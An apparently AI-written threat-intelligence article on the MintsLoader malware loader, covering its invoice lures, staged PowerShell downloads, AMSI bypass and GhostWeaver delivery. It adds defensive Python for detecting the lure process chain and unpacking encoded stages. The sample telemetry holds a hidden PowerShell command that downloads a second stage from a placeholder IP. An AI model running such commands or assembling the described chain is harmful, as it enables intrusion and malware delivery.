Ethical Hacking News
MintsLoader is a sophisticated malware loader that delivers advanced persistent threats via a multi-stage chain involving obfuscated JavaScript and PowerShell scripts. The malware has been observed delivering various follow-on payloads, including the GhostWeaver RAT, through fake invoice files and phishing campaigns. Experts have identified several threat actors utilizing MintsLoader in their campaigns, highlighting the need for enhanced security measures against this evolving threat.
MintsLoader is a sophisticated malware loader that delivers advanced persistent threats via a multi-stage chain involving obfuscated JavaScript and PowerShell scripts. Attackers use fake invoice files to deliver MintsLoader payloads, primarily targeting industrial and professional sectors in North America and Europe. MintsLoader has three stages: the first stage downloads the second stage from a remote server, the second stage downloads the third stage via an HTTP GET request, and the third stage generates a unique key for communication with a C2 server. Several threat actors use MintsLoader in their campaigns, including TAG-124, which relies on phishing messages, fake browser updates, and invoice lures to deliver the malware. The evolution of MintsLoader also reflects a shift from anonymous VPS providers to traditional bulletproof hosters, which aims to harden the attackers' infrastructure against takedown attempts.
MintsLoader, a sophisticated malware loader, has been identified as a significant threat by security researchers. The malware has been observed delivering various follow-on payloads, including the GhostWeaver RAT, through an intricate multi-stage chain involving obfuscated JavaScript and PowerShell scripts. This article provides an in-depth analysis of MintsLoader's attack mechanisms, its evolution over time, and the tactics used by threat actors to evade detection.
The use of fake invoice files (e.g., "Fattura####.js") is a notable tactic employed by MintsLoader operators to deliver the loader's payloads. This approach has been observed primarily in industrial and professional sectors in North America and Europe. The malware's first stage executes a PowerShell command that downloads the second stage from a remote server, using evasion techniques such as junk code and disguised commands to bypass detection.
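The first-stage chain above (a script host running a "Fattura####.js" lure, which then spawns a downloading PowerShell process) is easy to express as a parent-child process check. The following is an added detection example, not code from the article or from Recorded Future; the event format, PIDs, paths and the 203.0.113.10 address are constructed sample telemetry.

```python
import re

# Constructed, simplified process-creation records standing in for EDR/Sysmon
# telemetry; none of these values come from real MintsLoader activity.
SAMPLE_EVENTS = [
    {"pid": 100, "ppid": 1, "image": r"C:\Windows\explorer.exe",
     "cmdline": "explorer.exe"},
    {"pid": 200, "ppid": 100, "image": r"C:\Windows\System32\wscript.exe",
     "cmdline": r'wscript.exe "C:\Users\user\Downloads\Fattura4821.js"'},
    {"pid": 300, "ppid": 200,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": 'powershell.exe -w hidden -c "Invoke-WebRequest http://203.0.113.10/stage2"'},
    {"pid": 400, "ppid": 100,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -c Get-Date"},
]

# The lure naming pattern the article cites: "Fattura", four digits, ".js".
INVOICE_LURE = re.compile(r"\bFattura\d{4}\.js\b", re.IGNORECASE)
# Common PowerShell download idioms; they raise confidence but are not required.
DOWNLOAD_HINT = re.compile(
    r"Invoke-WebRequest|Invoke-RestMethod|DownloadString|Net\.WebClient|\biwr\b|\birm\b",
    re.IGNORECASE)
SCRIPT_HOSTS = ("wscript.exe", "cscript.exe")


def find_invoice_lure_chains(events):
    """Return (script_host_pid, powershell_pid, downloads) for every PowerShell
    process whose parent is a script host that launched a Fattura####.js file."""
    by_pid = {e["pid"]: e for e in events}
    hits = []
    for event in events:
        if not event["image"].lower().endswith("powershell.exe"):
            continue
        parent = by_pid.get(event["ppid"])
        if parent is None or not parent["image"].lower().endswith(SCRIPT_HOSTS):
            continue
        if INVOICE_LURE.search(parent["cmdline"]):
            downloads = bool(DOWNLOAD_HINT.search(event["cmdline"]))
            hits.append((parent["pid"], event["pid"], downloads))
    return hits


if __name__ == "__main__":
    for host_pid, ps_pid, downloads in find_invoice_lure_chains(SAMPLE_EVENTS):
        print(f"invoice-lure chain: script host {host_pid} -> powershell {ps_pid}, download={downloads}")
```

Only the chain rooted at the lure is reported; the unrelated PowerShell process launched from Explorer is ignored.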
The third stage of MintsLoader is more sophisticated. It downloads a PowerShell script from a command-and-control (C2) server via an HTTP GET request. The script contains a Base64-encoded payload that is XOR-decoded and decompressed to reveal heavily obfuscated code. The script disables AMSI protections and runs multiple system checks, such as VM detection, DAC type, and cache memory purpose, to generate a unique key that is sent to the C2.
Based on the system's characteristics and campaign ID, the script constructs a dynamic domain using a simple domain generation algorithm (DGA) to fetch stage three. If the target passes the checks, the loader downloads advanced malware like GhostWeaver, a PowerShell-based RAT with TLS-encrypted C2 communication and capabilities to redeploy MintsLoader. Conversely, if the system fails validation, the C2 may deliver a decoy executable like AsyncRAT.
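An analyst recovering the obfuscated script has to reverse the Base64, XOR and decompression layers described above. The block below is an added unpacking helper, not code from the article or from Recorded Future; it assumes a repeating byte XOR key and tries gzip, zlib and raw deflate because the page does not name the compression format, and the sample script, key and blob are constructed here.

```python
import base64
import zlib


def xor_bytes(data: bytes, key: bytes) -> bytes:
    """XOR data against a repeating byte key (the key scheme is an assumption; the
    article only says the payload is XOR-decoded)."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def unpack_stage(blob: str, key: bytes) -> str:
    """Reverse the Base64 -> XOR -> decompress chain described for the downloaded
    PowerShell script. The compression format is not named on the page, so gzip,
    zlib and raw deflate are each tried in turn."""
    decoded = xor_bytes(base64.b64decode(blob), key)
    for wbits in (zlib.MAX_WBITS | 16, zlib.MAX_WBITS, -zlib.MAX_WBITS):
        try:
            return zlib.decompress(decoded, wbits).decode("utf-8", errors="replace")
        except zlib.error:
            continue
    raise ValueError("XOR key or compression format did not match the blob")


def pack_stage(script: str, key: bytes) -> str:
    """Build a blob of the same shape from a known script, only so the unpacker can
    be exercised offline against constructed input."""
    packed = xor_bytes(zlib.compress(script.encode("utf-8")), key)
    return base64.b64encode(packed).decode("ascii")


def mentions_amsi(script: str) -> bool:
    """Quick triage check: flag recovered scripts that reference AMSI, which the
    article says the loader tampers with."""
    return "amsi" in script.lower()


# Constructed, harmless sample stage and key; not real MintsLoader artifacts.
SAMPLE_KEY = b"\x5a\xa3\x17"
SAMPLE_SCRIPT = "Write-Output 'constructed sample stage'"
SAMPLE_BLOB = pack_stage(SAMPLE_SCRIPT, SAMPLE_KEY)

if __name__ == "__main__":
    recovered = unpack_stage(SAMPLE_BLOB, SAMPLE_KEY)
    print(recovered)
    print("references AMSI:", mentions_amsi(recovered))
```

A wrong key yields bytes that no decompressor accepts, so the helper raises instead of returning garbage.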
Experts have observed several threat actors utilizing MintsLoader in their campaigns. Notably, TAG-124 has been linked to this malware loader. The attack chain commences via phishing messages, fake browser updates, and invoice lures through Italy's PEC email system. In early 2025, Recorded Future researchers observed a phishing campaign targeting the U.S. and European energy, oil, gas, and legal sectors; attackers attempted to deliver MintsLoader via malicious JavaScript or fake verification pages.
The evolution of MintsLoader highlights the shift in tactics by threat actors from anonymous virtual private server (VPS) providers to more traditional bulletproof hosters like SCALAXY-AS and Stark Industries. This move likely aims to harden their infrastructure against takedown attempts and enhance operational stability.
Recorded Future researchers have shared up-to-date C2 domains and other artifacts related to recent MintsLoader attacks, giving defenders insight into the malware's attack mechanisms and the tactics used by threat actors. These findings underscore the importance of staying vigilant and proactive in detecting emerging threats like MintsLoader.
Related Information:
https://www.ethicalhackingnews.com/articles/MintsLoader-A-Malicious-Malware-Loader-Delivers-Advanced-Persistent-Threats-via-Multi-Stage-Chain-ehn.shtml
https://securityaffairs.com/177448/malware/experts-shared-up-to-date-c2-domains-and-other-artifacts-related-to-recent-mintsloader-attacks.html
https://fidelissecurity.com/threatgeek/threat-detection-response/c2-command-and-control-detection/
https://cybermaterial.com/asyncrat-trojan-malware/
https://thesecmaster.com/blog/asyncrat
https://thehackernews.com/2025/01/mintsloader-delivers-stealc-malware-and.html
https://thehackernews.com/2025/05/mintsloader-drops-ghostweaver-via.html
https://cybersecuritynews.com/apt-attack/
https://www.socinvestigation.com/comprehensive-list-of-apt-threat-groups-motives-and-attack-methods/
Published: Mon May 5 07:42:42 2025 by llama3.2 3B Q4_K_M